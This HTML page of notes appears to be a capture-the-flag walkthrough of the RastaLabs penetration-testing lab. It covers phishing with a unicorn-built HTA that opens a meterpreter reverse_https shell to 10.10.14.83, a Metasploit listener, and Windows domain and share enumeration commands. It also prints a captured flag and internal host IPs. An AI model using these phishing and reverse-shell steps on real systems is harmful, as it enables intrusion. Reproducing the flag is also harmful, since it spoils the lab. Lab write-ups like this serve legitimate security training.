<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>2 flag</title>
</head><body>after gaining the outlook access, let do phishing attack and gain access to the system from which the user clicks the link,<br/>
<br/>
use unicorn to create hta (executable html file)<br/>
<br/>
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
copy the index.html and launcher.hta to apache2 directory and service apache2 start <br/>
setup listener,<br/>
<br/>
msfconsole -r unicorn.rc<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
found flag.txt in Administrator\desktop but cant read, access denied<br/>
<br/>
enumerate all the shares,<br/>
<br/>
net share - &nbsp;to view shares in current system<br/>
net view &nbsp;- to view all shares in network<br/>
<br/>
net use K: \\hostname\share$ - to mount the share<br/>
net view \\hostname /all - to view all share in that host<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
net user /domain - displays all user accounts<br/>
<br/>
<br/>
<img src="image.png" width="800" height="682" /><br/>
&nbsp;<br/>
<br/>
net user [username] /domain - to view user info<br/>
<br/>
<br/>
<img src="image 2.png" width="800" height="565" /><br/>
&nbsp;<br/>
<br/>
C:\WINDOWS\system32&gt;net group finance /domain<br/>
net group finance /domain<br/>
The request will be processed at a domain controller for domain rastalabs.local.<br/>
<br/>
Group name &nbsp; &nbsp; Finance<br/>
Comment &nbsp; &nbsp; &nbsp; &nbsp;<br/>
<br/>
Members<br/>
<br/>
-------------------------------------------------------------------------------<br/>
bowen &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
The command completed successfully.<br/>
<br/>
<br/>
while enumeration found a share mounted as M,<br/>
<br/>
<br/>
fsutil fsinfo drives - to list logical drives<br/>
<br/>
wmic logicaldisk get name - to list logical drives<br/>
<br/>
diskpart &gt; list voulme - full info abt drives<br/>
<br/>
<br/>
<img src="screenshot 4.png" /><br/>
&nbsp;<br/>
<br/>
<br/>
RASTA{w007_f007h0ld_l375_pwn}<br/>
<br/>
Found passwords.kbdx and key file in M:\Documents<br/>
<br/>
<br/>
now ping all servers n systems to find it ips,<br/>
<br/>
DC01&#09;-&#09;10.10.120.1<br/>
FS01&#09;-&#09;10.10.120.5<br/>
MX01&#09;-&#09;10.10.120.10<br/>
NIX01&#09;-&#09;10.10.122.20<br/>
SQL01&#09;-&#09;10.10.122.15<br/>
WS01&#09;-&#09;10.10.121.100<br/>
WS02&#09;-&#09;10.10.121.101<br/>
WS03&#09;-&#09;10.10.123.100<br/>
WS05&#09;-&#09;10.10.123.102<br/>
<br/>
<br/>
</body></html>